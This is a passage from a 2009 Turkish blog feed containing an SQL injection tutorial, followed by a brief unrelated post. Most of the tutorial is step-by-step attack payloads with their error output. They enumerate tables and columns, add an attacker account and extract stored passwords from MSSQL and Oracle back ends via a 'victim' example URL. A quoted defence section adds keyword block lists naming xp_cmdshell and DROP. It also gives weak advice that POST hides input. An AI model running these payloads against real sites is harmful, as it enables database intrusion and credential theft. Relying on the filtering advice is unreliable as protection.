Hataları Saldırgan İçin Çok Önemli Bir Avantajdır. ODBC Hatalarını Kullanarak Gerek Veritabanına Gerekse Diğer Veritabanlarına Ait Bilgileri ODBC Rahatça Ele Geçirebilir.&lt;br /&gt;&lt;br /&gt;• Tablo ve Kolonları Öğrenmek&lt;br /&gt;Login Bypassing Başlığı Altında Saldırganın Oturum Açma Panellerini Nasıl Şifresiz Geçtiğini Görmüştük. Şimdi İse Saldırganın Yine Aynı Panelleri Kullanarak Özel Bilgilere Nasıl Erişebildiğini İnceleyelim.&lt;br /&gt;&lt;br /&gt;Kullanicilar Tablosu;&lt;br /&gt;ID(Int)&lt;br /&gt;KullAdi(VarChar)&lt;br /&gt;Sifre(VarChar)&lt;br /&gt;Email(VarChar)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Select * From kullanicilar where kulladi=’zero’ and sifre =’tolerance’ &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Eğer ODBC Hataları Tarayıcıda Gösteriliyorsa Saldırgan Bu Hatalardan Yararlanarak Injection Açığını Bilgileri Almak Amacıyla Exploit Edecektir.&lt;br /&gt;&lt;br /&gt;‘ having 1=1-- &lt;br /&gt;&lt;br /&gt;Dönecek Hata Mesajı ;&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘Kullanicilar.ID’ is&lt;br /&gt;invalid in the select list because it is not contained in an aggregate&lt;br /&gt;function and there is no GROUP BY clause.&lt;br /&gt;&lt;br /&gt;Buradan Saldırgan Bir Kullanicilar Tablosunun Var Olduğunu ve Bu Tabloya Ait İlk Kolonun ID Olduğunu Öğrenmiştir. Sonraki Aşama Saldırı Sorgusuna Teker Teker Bulduğu Kolon İsimlerini Eklemektir.&lt;br /&gt;&lt;br /&gt;‘ group by kullanicilar.id having 1=1—&lt;br /&gt;&lt;br /&gt;Dönecek Hata Mesajı ;&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘Kullanicilar.Kulladi’&lt;br /&gt;is invalid in the select list because it is not contained in either an&lt;br /&gt;aggregate function or the GROUP BY clause.&lt;br /&gt;&lt;br /&gt;Burada Saldırgan İkinci Kolonun KullAdi Olduğunu Öğrenmiştir. Saldırı Sorgusuna Bulduğu İkinci , Üçüncü, Dördüncü (Bulduğu Kadar) Kolonuda Ekleyerek  İşlem Yapılan Bütün Kolonları Bulur.&lt;br /&gt;&lt;br /&gt;‘ group by kullanicilar.id, kullanicilar.kulladi, kullanicilar.sifre, kullanicilar.email having 1=1-- (Bütün Kolonlar)&lt;br /&gt;&lt;br /&gt;Bütün Kolonları Bulunca Herhangi Bir Hata Mesajı Döndürülmeyecektir.&lt;br /&gt;&lt;br /&gt;Sonraki Aşama Bütün Kolonların Veri Türlerini Belirlemektir. &lt;br /&gt;&lt;br /&gt;‘ Union Select sum(kulladi) From Kullanicilar&lt;br /&gt;&lt;br /&gt;Bu Sorgu KullAdi Kolonundaki Verileri Birleştirir ve Aşağıdaki Gibi Bir Hata Verdirir. (SUM &gt; Toplama Fonksiyonu)&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average&lt;br /&gt;aggregate operation cannot take a varchar data type as an argument.&lt;br /&gt;&lt;br /&gt;Saldırgan Burada KullAdi Kolonunun String Veri Türlü ve  VarChar Veri Tipli Olduğu Anlar. Çünkü Sum Fonksiyonu Sayısal Değerleri Topladığı İçin String Değerlerde Hata Verecektir.&lt;br /&gt;&lt;br /&gt;Saldırgan Veri Tiplerini Öğrenmeye Devam Eder Çünkü Amacına Yeterince Ulaşmamıştır Yine Sum Fonksiyonunu Kullanarak ;&lt;br /&gt;&lt;br /&gt;‘ Union Select Sum(ID) From Kullanicilar &lt;br /&gt;&lt;br /&gt;Bu Sorgu Veritabanına Gönderildiği Zaman Şöyle Bir Hata Mesajı Döner ;&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL&lt;br /&gt;statement containing a UNION operator must have an equal number of&lt;br /&gt;expressions in their target lists.&lt;br /&gt;&lt;br /&gt;Saldırgan Sum Fonksiyonunun Başarıyla İşlem Yaptığını, Fakat Döndürülen Hatada Veri Tabanında 4 Kolon Olduğunu Gönderilen Sorguda Tek Kolon Olduğunu Söyler. Bu Saldırganı Pek İrdelemez Çünkü ID Kolonunun Numerik Veri Tipli Olduğunu Anlamıştır. (Sum Fonksiyonu Başarıyla Çalıştı).&lt;br /&gt;&lt;br /&gt;Bu İşlem Bütün Kolon Veri Tiplerini Öğrenene Kadar Devam Ettirilir. Saldırgan Bütün Veri Tiplerini Öğrendikten Sonra Veritabanına Hükmedebilir. Yeni Veri Ekleyebilir, Güncelleştirebilir, Silebilir………&lt;br /&gt;&lt;br /&gt;Saldırganın Tabloya Yeni Veri Ekleyeceğini Varsayalım.&lt;br /&gt;&lt;br /&gt;‘; Insert Into Kullanicilar Values (‘999’,’Saldirgan’,’passwd’,’saldirgan@mail.com’)—&lt;br /&gt;&lt;br /&gt;Bu Sorguyla Veritabanına 999 Numaralı, Saldırgan Nickli, passwd Şifreli ve Maili saldirgan@mail.com Bilgileriyle Yeni Kullanıcı Eklendi.&lt;br /&gt;&lt;br /&gt;• İşe Yarayan Bilgileri Almak (Veri Çekmek)&lt;br /&gt;Saldırgan Veritabanında Var Olan Verileri Çekmek İçin Veri Tiplerini Ters Gösteren Sorgular Yazar. Örneğin String Verileri Integer, Integer Verileri String Tiplerine Dönüştürerek Bu İşlemi Gerçekleştirebilir. SQL ‘de Convert Fonksiyonu Vardır. Bu Fonksiyon Veri Tiplerini Çevirmeyi Sağlar. Fakat Convert Fonksiyonuna Geçmeden Önce Farklı Bir Yöntem Deneyelim. (Var – Yok Olayı)&lt;br /&gt;Saldırgan String Veri Tipli Bir Kolonun İçinde Integer Ararsa Server Hata Verir.&lt;br /&gt;&lt;br /&gt;‘ OR 1 in (select @@version)-- &lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting&lt;br /&gt;the nvarchar value ‘Microsoft SQL Server 2000 - 8.00.194 (Intel X86)&lt;br /&gt;Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation&lt;br /&gt;Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 2) ‘&lt;br /&gt;to a column of data type int.&lt;br /&gt;&lt;br /&gt;Bu İşlem Sadece Server Versiyonu Almaktan İbaret Değildir.&lt;br /&gt;&lt;br /&gt;‘ OR 1 in (select sifre from kullanicilar where kulladi=’admin’)-- &lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting&lt;br /&gt;the varchar value ‘zerotolerance’ to a column of data type int.&lt;br /&gt;&lt;br /&gt;Convert Fonksiyonuyla İse Mantık Aynı Fakat Kullanım Farklı. Genelde Numerik Verilere Uygulanan Injectionlarda Kullanılır.&lt;br /&gt;&lt;br /&gt;1 and 1=convert(int,(select top 1 sifre from kullanicilar where kulladi=’admin’))-- &lt;br /&gt;&lt;br /&gt;Bu Sorgu İle ‘or 1 in (select sifre from kullanicilar where kulladi=’admin’)-- arasında Fark Yoktur. Aynı Hata Döner.&lt;br /&gt;&lt;br /&gt;• Kayıt İlerletme&lt;br /&gt;Saldırganın Veritabanından Almak İstediği Bilgiler her Zaman İlk Veriler Olmayabilir. Bunu İçin Saldırgan Verileri (Kayıt) İlerleterek İstediği Bilgilere Ulaşmayı Dener. Saldırgan Önceki Veri Çekme Tekniğini Kullanarak Aynı İşlemi Yapabilir Fakat Kullandığı Sorguya Koşul Ekler. Koşulda İstediği Veri Tipini, Adını vs. Belirler.&lt;br /&gt;&lt;br /&gt;‘ OR in (select min(kulladi) from kullanicilar where username &gt; ‘a’)--&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting&lt;br /&gt;the varchar value ‘admin’ to a column of data type int.&lt;br /&gt;&lt;br /&gt;Saldırganın İstediği Kullanıcı Adı Admin Olmayabilir Dolayısıyla ;&lt;br /&gt;&lt;br /&gt;‘ OR in (select min(kulladi) from kullanicilar where username &gt; ‘admin’)—&lt;br /&gt;&lt;br /&gt;Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07’&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting&lt;br /&gt;the varchar value ‘ahmet’ to a column of data type int.&lt;br /&gt;&lt;br /&gt;Saldırgan Bu şekilde Kayıtları İlerleterek (Farklı Yöntemlerde Var, Üretebilir) İstediği Verileri Alabilir.&lt;br /&gt;&lt;br /&gt;8.  Açığı Database Tiplerine Göre Exploit Etmek (MySQL, MSSQL, Oracle)&lt;br /&gt;&lt;br /&gt;Her Veritabanı Farklı Yapıda Olduğu İçin Verilerin Depolandığı Tablolar, Tipler vs. Farklıdır.&lt;br /&gt;&lt;br /&gt;• MSSQL&lt;br /&gt;Bir Ürün Sayfasını Ele Alalım. Ürün İsmine Tıklandığı Zaman Ürünün ID’sine Göre Ürün Detayları Çağırılsın.&lt;br /&gt;&lt;br /&gt;select * from urunler where id = "&amp;id&amp;"&lt;br /&gt;&lt;br /&gt;Urunler Tablosu Kolonları ;&lt;br /&gt;ID&lt;br /&gt;Ad&lt;br /&gt;Detay&lt;br /&gt;&lt;br /&gt;URL ; http://kurban.com/urun.asp?id=1&lt;br /&gt;&lt;br /&gt;Sonuçlar ; &lt;br /&gt;AirTies RT 105 ADSL Modem |  Kablolu Modem&lt;br /&gt;&lt;br /&gt;Saldırgan Union İle Sorgu Birleştirip Kolon Sayısını Eşitleyecektir.&lt;br /&gt;&lt;br /&gt;http://kurban.com/urun.asp?id=1’ Union Select null--&lt;br /&gt;&lt;br /&gt;Dönecek Hata ;&lt;br /&gt;&lt;br /&gt;[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL&lt;br /&gt;statement containing a UNION operator must have an equal number of&lt;br /&gt;expressions in their target lists.&lt;br /&gt;&lt;br /&gt;Kolon Sayısının Eşleşmediğini Söylüyor. Yeni Boş (null) Değer Ekleyerek Saldırgan İşleme Devam Eder. Ta ki Kolon Sayısını Eşleştirene Kadar.&lt;br /&gt;&lt;br /&gt;http://kurban.com/urun.asp?id=1’ Union Select null,null,null--&lt;br /&gt;&lt;br /&gt;* Kolon Sayısı Eşleştiği Zaman Sayfa Olduğu Gibi Görünür.&lt;br /&gt;&lt;br /&gt;Saldırgan Önceki İşlemlerde Olduğu Gibi MSSQL Server Tarafından Kullanılan Genel Değişkenleri Sayfada Yansıtmak İster. (@@version vs.)&lt;br /&gt;&lt;br /&gt;Daha Sonra Saldırgan Veri Bulunan Tablo ve Kolon Adlarını sysobjects Tablosundan Çekmeye Çalışır. (sysobjects Tablosunda Veritabanı Ayrıntıları Bulunur.) Saldırgan Kendi Tanımlayacağı Bilgileri Almak İçin xtype=’U’ Parametresini Kullanır. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://kurban.com/urun.asp?id=1’ Union Select null,name,null From sysobjects where xtype=’U’ --&lt;br /&gt;&lt;br /&gt;Sayfa ;&lt;br /&gt;AirTies RT 105 ADSL Modem | Kablolu Modem&lt;br /&gt;Dtproperties&lt;br /&gt;Kullanicilar&lt;br /&gt;Urunler&lt;br /&gt;&lt;br /&gt;Saldırgan Kullanicilar Tablosunu Bulmuştur. Kullanıcı Bilgilerini Almak İçin Kullanıcılar Tablosunun Kolonlarını Öğrenmek Zorundadır. Bunu syscolumns Tablosuna Sorgu Göndermeyi Deneyerek Başarmak İster.&lt;br /&gt;&lt;br /&gt;http://kurban.com/urun.asp?id=1’ Union Select null,name,null From sysobjects,syscolumns where id=id and name=’Kullanicilar’--&lt;br /&gt;&lt;br /&gt;Sayfa ;&lt;br /&gt;AirTies RT 105 ADSL Modem | Kablolu Modem&lt;br /&gt;ID&lt;br /&gt;Email&lt;br /&gt;KullAdi&lt;br /&gt;Sifre&lt;br /&gt;&lt;br /&gt;Saldırgan Amacına Ulaşmıştır. Tablo ve Kolon Bilgilerini Almıştır Geriye Kalan Tek Şey Aldığı Tablo ve Kolonlardan Bilgileri Çekmektir.&lt;br /&gt;&lt;br /&gt;http://kurban.com/urun.asp?id=1’ Union Select null,kulladi,sifre from Kullanicilar--&lt;br /&gt;&lt;br /&gt;Sayfa ;&lt;br /&gt;AirTies RT 105 ADSL Modem | Kablolu Modem&lt;br /&gt;Admin | admin&lt;br /&gt;Ahmet | zeroo&lt;br /&gt;ZeroTolerance | ztzt&lt;br /&gt;&lt;br /&gt;Not : Tablo Tipleri Eşleşmelidir. Yukarıda Anlatıldı.&lt;br /&gt;&lt;br /&gt;• Oracle&lt;br /&gt;Oracle Injection’ları Exploit Etmek MSSQL Gibidir Fakat Sistem Tablo İsimleri Farklıdır. MSSQL Bölümündeki Sayfayı Tekrar Ele Alalım. (DB tipi Oracle!)&lt;br /&gt;&lt;br /&gt;Saldırgan Yine Union Atağı Yaparak Kolon Sayısını Eşleştirmeye Çalışacaktır.&lt;br /&gt;&lt;br /&gt;http://kurban.com/urun.asp?id=1’ Union Select null--&lt;br /&gt;&lt;br /&gt;Eğer Kolon Sayısı Eşleşmediyse ;&lt;br /&gt;&lt;br /&gt;[Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result&lt;br /&gt;columns&lt;br /&gt;&lt;br /&gt;Hatasını Verecektir. Eşleştiyse MSSQL’deki Gibi Veriler Sayfada Gösterilecektir.&lt;br /&gt;&lt;br /&gt;http://kurban.com/urun.asp?id=1’ Union Select null,null,null--&lt;br /&gt;&lt;br /&gt;Sayfa ;&lt;br /&gt;AirTies RT 105 ADSL Modem | Kablolu Modem&lt;br /&gt;&lt;br /&gt;Saldırgan MSSQL’de Yaptığı Gibi Sayfada String Tipli Kolonları Arar. (Bunun İçin null Değerleri String Sorguları Gönderir.)&lt;br /&gt;&lt;br /&gt;Örn : &lt;br /&gt;&lt;br /&gt;http://kurban.com/urun.asp?id=1’ Union Select ‘a’,null,null --&lt;br /&gt;&lt;br /&gt;Eğer 1. Kolon String Tipli Değilse Sayfa ;&lt;br /&gt;&lt;br /&gt;[Oracle][ODBC][Ora]ORA-01790: expression must have same datatype as&lt;br /&gt;corresponding expression&lt;br /&gt;&lt;br /&gt;Hatasını Verir. String Tipliyse ;&lt;br /&gt;&lt;br /&gt;Sayfa ;&lt;br /&gt;&lt;br /&gt;AirTies RT 105 ADSL Modem | Kablolu Modem&lt;br /&gt;a&lt;br /&gt;&lt;br /&gt;Şeklinde Olur.&lt;br /&gt;&lt;br /&gt;Saldırgan Kolon Tiplerinide Öğrendikten Sonra Sistem Tablolarından Erişmek İstediği Tablo ve Kolonları Çekmeye Çalışır. (User_objects Tablosu)&lt;br /&gt;&lt;br /&gt;http://kurban.com/urun.asp?id=1’ Union Select null,object_name,object_type From user_objects--&lt;br /&gt;&lt;br /&gt;Sayfa ;&lt;br /&gt;&lt;br /&gt;AirTies RT 105 ADSL Modem | Kablolu ADSL Modem&lt;br /&gt;GETEMP | PROCEDURE&lt;br /&gt;Kullanicilar | TABLE&lt;br /&gt;Urunler | TABLE&lt;br /&gt;PK_Kullanicilar | INDEX&lt;br /&gt;&lt;br /&gt;Saldırgan Aradığını Bulmuştur. “Kullanicilar”. Sıra Kolon İsimlerini Almaya Gelmiştir. Kolon İsimleri Oracle Veritabanlarında user_tab_columns Tablosunda Barınmaktadır.&lt;br /&gt;&lt;br /&gt;http://kurban.com/urun.asp?id=1’ Union Select null,column_name,null From user_tab_columns where table_name=’Kullanicilar’--&lt;br /&gt;&lt;br /&gt;Sayfa ;&lt;br /&gt;&lt;br /&gt;AirTies RT 101 ADSL Modem | Kablolu ADSL Modem&lt;br /&gt;ID&lt;br /&gt;Email&lt;br /&gt;KullAdi&lt;br /&gt;Sifre&lt;br /&gt;&lt;br /&gt;Saldırgan Bilgileri Aldıktan Sonra Bilgileri, Sorgu Göndererek Sayfada Yansıtmaya Çalışır.&lt;br /&gt;&lt;br /&gt;http://kurban.com/urun.asp?id=1’ Union Select null,kulladi,sifre,null From Kullanicilar--&lt;br /&gt;&lt;br /&gt;Sayfa ;&lt;br /&gt;&lt;br /&gt;AirTies RT 105 ADSL Modem | Kablolu ADSL Modem&lt;br /&gt;Admin | admin&lt;br /&gt;Ahmet | zeroo&lt;br /&gt;ZeroTolerance | ztzt&lt;br /&gt;&lt;br /&gt;9. SQL Injection Güvenliği &lt;br /&gt;&lt;br /&gt;Bu Kısım Alıntıdır. Çünkü Benim Söyleyeceklerimle Hemen Hemen Birebir Aynı.&lt;br /&gt;&lt;br /&gt;Gelebilecek SQL Enjeksiyon saldırılarından korunabilmek için alınan önlemlerde temel alınması geren nokta... "Aksi doğrulanıncaya kadar tüm kullanıcı girdileri kötüdür!". &lt;br /&gt;&lt;br /&gt;3.1. Kullanıcı Haklarının Sınırlandırılması &lt;br /&gt;&lt;br /&gt;Yaygın olarak yapılan hata; Web Server dan SQL Server a yapılan bağlantılarda varsayılan sistem hesabı kullanılması... Bu şekilde yönetici haklarına sahip olan saldırgan örneklerde de görülebileceği üzere isteği komutu çalıştırıp istediği ekleme,silme,düzeltme eylemini gerçekleştirebilecektir. Bunu yerine yapılması gereken yeni bir kullanıcı hesabı oluşturup kullanıcının çalıştırabileceği komutları sınırlandırmak olacaktır. &lt;br /&gt;&lt;br /&gt;Mesela sitenizden ürünlerinizin incelenmesine ve bunlar arasından sipariş verilmesine izin verecekseniz, "web_user" gibi bir kullanıcı adı oluşturup ürünleri incelemek için; ürünler sütununda sadece "SELECT" kullanımına ve siparişleri için; siparişler sütununda sadece "INSERT" kullanımına izin vermeniz uygun olacaktır. &lt;br /&gt;&lt;br /&gt;3.2. Girdilerde Tırnak İmleçlerinin (’) Kötü Amaçlı Kullanımının Engellenmesi &lt;br /&gt;&lt;br /&gt;Yaygın SQL Enjeksiyon saldırıları SQL deyimlerinin girdilerdeki gereksiz (’) tırnak işaretleri yardımıyla yeniden oluşturulması sayesinde yapılır. &lt;br /&gt;&lt;br /&gt;Küçük bir filtreleme fonksiyonu veya tek tırnağı çift tırnağa çeviren bir fonksiyon muhtemel bir saldırıyı engellmek için yeterli olabilir. &lt;br /&gt;&lt;br /&gt;ASP Kullanarak girdileri kontrol ederek değiştiren bir fonksiyon kolaylıkla yazılabilir; &lt;br /&gt;&lt;br /&gt;&lt;%&lt;br /&gt;Function ReplaceQuotes(strWords)&lt;br /&gt;ReplaceQuotes = Replace(strWords,”’”,”””)&lt;br /&gt;End Function&lt;br /&gt;%&gt; &lt;br /&gt;&lt;br /&gt;Bu fonksiyonu baştaki örnekte kullanırsak; &lt;br /&gt;&lt;br /&gt;SELECT count(*) FROM Users WHERE Username=’ilkay’ AND Password=’’ OR 1=1 --’ &lt;br /&gt;&lt;br /&gt;şeklinde olan deyim... &lt;br /&gt;&lt;br /&gt;SELECT count(*) FROM Users WHERE Username=’ilkay’ AND Password=’" OR 1=1 --’ &lt;br /&gt;&lt;br /&gt;’e dönüşecektir. &lt;br /&gt;&lt;br /&gt;3.3. Form Girdilerinden Gereksiz Karakterlerin Elenmesi &lt;br /&gt;&lt;br /&gt;SQL Enjeksiyon saldırıları genelde ";, --,SELECT, INSERT ve xp_" gibi karakterlerin-kelimelerin kullanılmasıyla yapıldığı için gönderilecek girdinin önce bir filtreleme fonksiyonundan geçirilmesi muhtemel zayıflığı engelleyebilir.Örneğin kullanıcıdan E - Mail adresini girmesi isteniyorsa harfler ve sayıların yanında sadece " @,-,_,." karakterlerinin kullanılmasına izin verilmelidir. &lt;br /&gt;&lt;br /&gt;Ve sunucuda saklanan xp_cmdshell ve xp_grantlogin gibi genel prosedürler,C/C++ tabanlı DLL ler, kullanıcı taraflı fonksiyonlar...vb, izole edilmiş bir sunucuya taşınmalıdır. Bazı zararlı kelime-harfleri filteleyen ASP fonksiyonu aşağıda örneklenmiştir; &lt;br /&gt;&lt;br /&gt;&lt;%&lt;br /&gt;Function FilterBadWords(strWords)&lt;br /&gt;dim BadWords&lt;br /&gt;dim NewWords&lt;br /&gt;BadWords = array("SELECT", "DROP", ";", "--", "INSERT", "DELETE", "xp_"’)&lt;br /&gt;NewWords = strWords&lt;br /&gt;for i = 0 to uBound(BadWords)&lt;br /&gt;NewWords = Replace(NewWords, BadWords(i), ""’)&lt;br /&gt;Next&lt;br /&gt;FilterBadWords = NewWords&lt;br /&gt;End Function&lt;br /&gt;%&gt; &lt;br /&gt;&lt;br /&gt;Tırnak değiştirme fonksiyonu ve filtreleme fonksiyonu beraber kullanılırsa; &lt;br /&gt;&lt;br /&gt;SELECT Username FROM Users WHERE Usename=’’; EXEC master..xp_cmdshell ’dir c’; --’ AND Password=’’ &lt;br /&gt;&lt;br /&gt;Şeklindeki SQL Deyimi... &lt;br /&gt;&lt;br /&gt;SELECT Username FROM Users WHERE Usename=’" EXEC master.. cmdshell "dir c:" ’ AND Password=’’ &lt;br /&gt;&lt;br /&gt;e dönüşecektir ki bu da herhangi bir kayıt bulumadığı hatasını vermekten öteye gitmeyecektir. &lt;br /&gt;&lt;br /&gt;Bu fonksiyonu kullanıcıdan gelen bütün girdilere, adres satırı ifadelerine ve çerezlerden gelen tüm veriye uygulamamız gelebilecek saldırının önüne geçecektir. &lt;br /&gt;&lt;br /&gt;3.4. Girdi Uzunluğunun Sınırlandırılması &lt;br /&gt;&lt;br /&gt;Veritabanındaki ayrılan alanın uzunluğu 10 karakterlikse, formunuzda bu alan için 50 karakter sığan bir text kutusuna sahip olmanız sakıncalı olabilir. Ve mümkün olduğu kadar girdi uzunluklarını kısa tutmak muhtemel saldırıyı engellemek için önlem sayılabilir. &lt;br /&gt;&lt;br /&gt;3.5. Girdi Cinsinin Kontrol Edilmesi &lt;br /&gt;&lt;br /&gt;Formunuzdan girilen verinin istediğiniz türden bir veri olup olmadığını kontrol eden bir fonksiyon kötü amaçlı kullanımlarda saldırganın kullanabileceği harf/sayı seçeneğini kısıtlayacaktır. Mesela, eğer Ürün ID si için formunuzdan girdi alıyorsanız girdinin sayısal bir ifade olup olmadığını kontrol eden bir fonksiyon fayda sağlayacaktır. &lt;br /&gt;&lt;br /&gt;3.6. Girdi Cinsinin Kontrol Edilmesi &lt;br /&gt;&lt;br /&gt;Formunuz aracılığı ile topladığınız verileri yollarken mutlaka "POST" metodunu kullanın ki kullanıcılarınız adres çubuğunda girdikleri verilerle beraber form değerlerini gördüklerinde akıllarına farklı fikirler gelmesin.&lt;br /&gt;&lt;br /&gt;10. Referanslar&lt;br /&gt;&lt;br /&gt;http://ferruh.mavituna.com Ferruh Mavituna&lt;br /&gt;http://www.unixwiz.net/techtips/sql-injection.html SQL Injection Attacks By Example&lt;br /&gt;http://www.securiteam.com/securityreviews/5DP0N1P76E.html SQL Injection Walkthrough&lt;br /&gt;http://msdn.microsoft.com/en-us/library/ms161953.aspx SQL Injection (Microsoft)&lt;br /&gt;http://www.owasp.org/index.php/SQL_Injection SQL Injection - Owasp&lt;br /&gt;www.ngssoftware.com/papers/advanced_sql_injection.pdf Advanced SQL Injection&lt;br /&gt;&lt;br /&gt;11. Bitiş&lt;br /&gt;Sizlere SQL Injection’ın Ne Olduğu, Nelerden Kaynaklandığı, Açıkların Nasıl Sömürülebileceği ve Alınabilecek Önlemler Hakkında Bilgi Verildi. &lt;br /&gt;&lt;br /&gt;                                                                                                                       Murat ŞEKER&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-2416236960743428913?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/2416236960743428913/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2009/06/sql-injection-attacks-security.html#comment-form' title='4 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/2416236960743428913'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/2416236960743428913'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2009/06/sql-injection-attacks-security.html' title='SQL Injection Attacks &amp; Security'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2887209772609553434.post-4051733167613206298</id><published>2009-06-12T10:54:00.001-07:00</published><updated>2009-06-15T14:26:23.189-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='blog'/><category scheme='http://www.blogger.com/atom/ns#' term='şeker'/><category scheme='http://www.blogger.com/atom/ns#' term='murat'/><title type='text'>Tekrar Blog Yazmaya Başladım</title><content type='html'>Merhaba&lt;br /&gt;Bende Bloglamaya Başladım. Kafama Estikçe Yazarım Artık :D&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2887209772609553434-4051733167613206298?l=mrtskr.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://mrtskr.blogspot.com/feeds/4051733167613206298/comments/default' title='Kayıt Yorumları'/><link rel='replies' type='text/html' href='http://mrtskr.blogspot.com/2009/06/tekrar-blog-yazmaya-basladim.html#comment-form' title='7 Yorum'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/4051733167613206298'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2887209772609553434/posts/default/4051733167613206298'/><link rel='alternate' type='text/html' href='http://mrtskr.blogspot.com/2009/06/tekrar-blog-yazmaya-basladim.html' title='Tekrar Blog Yazmaya Başladım'/><author><name>Murat ŞEKER</name><uri>http://www.blogger.com/profile/13786234878004274832</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/_hxteRo6O_s0/TNFQDMvPkEI/AAAAAAAAABc/VHLZhZ32F-I/S220/zT.gif'/></author><thr:total>7</thr:total></entry></feed>
